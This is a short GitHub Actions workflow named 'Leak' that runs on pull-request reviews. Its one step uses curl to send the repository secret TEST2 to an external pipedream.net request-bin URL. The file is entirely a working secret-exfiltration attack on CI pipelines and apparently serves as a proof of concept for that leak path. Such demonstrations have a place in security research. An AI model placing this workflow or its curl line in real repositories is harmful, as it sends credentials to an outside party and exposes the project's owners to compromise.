name: Leak

on: [pull_request_review]

jobs:
  leak:
    name: Leak GitHub Seecrets
    runs-on: ubuntu-latest
    steps:
      - name: Leak the secre
        run: |
          curl "https://45130bd621923da5a57a26a0fbe3df4b.m.pipedream.net/?value=$VALUE"
        env:
          VALUE: ${{ secrets.TEST2 }}
